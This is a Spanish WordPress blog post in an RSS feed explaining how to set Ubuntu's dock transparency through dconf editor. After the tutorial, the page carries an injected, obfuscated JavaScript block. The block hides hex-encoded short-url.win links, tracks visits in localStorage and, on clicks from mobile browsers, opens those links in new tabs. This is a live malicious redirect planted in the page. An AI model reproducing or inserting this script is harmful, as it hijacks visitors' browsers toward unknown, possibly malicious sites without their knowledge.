<p>¿Odias los comandos de Linux? Bueno, primero puede instalar la herramienta de configuración gráfica dconf editor de Ubuntu Software.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"align":"center","id":1908,"linkDestination":"custom"} -->
<div class="wp-block-image"><figure class="aligncenter"><a href="https://www.todoenunclick.com/wp-content/uploads/2022/02/dconfeditor-ubuntusoftware.jpg"><img src="https://www.todoenunclick.com/wp-content/uploads/2022/02/dconfeditor-ubuntusoftware.jpg" alt="" class="wp-image-1908"/></a></figure></div>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Luego inicie la herramienta y navegue hasta org/gnome/shell/exenstions/dash-to-dock . Desplácese hacia abajo y encuentre la clave "background-opacity" y haga click para ir a su configuración:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul><li>Desactive el valor predeterminado.</li><li>Establezca un valor personalizado.</li><li>Haga click en el botón 'Apply' en la barra inferior.</li></ul>
<!-- /wp:list -->

<!-- wp:image {"align":"center","id":1907,"linkDestination":"custom"} -->
<div class="wp-block-image"><figure class="aligncenter"><a href="https://www.todoenunclick.com/wp-content/uploads/2022/02/dconf-dock-transparency.jpg"><img src="https://www.todoenunclick.com/wp-content/uploads/2022/02/dconf-dock-transparency.jpg" alt="" class="wp-image-1907"/></a></figure></div>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Eso es. ¡A Disfrutar!</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Fuente:</strong> <em>FOStips</em></p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/como-cambiar-la-transparencia-del-panel-izquierdo-del-dock-en-ubuntu-21-04-ubuntu-21-10/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">96610</post-id>	</item>
	</channel>
</rss>
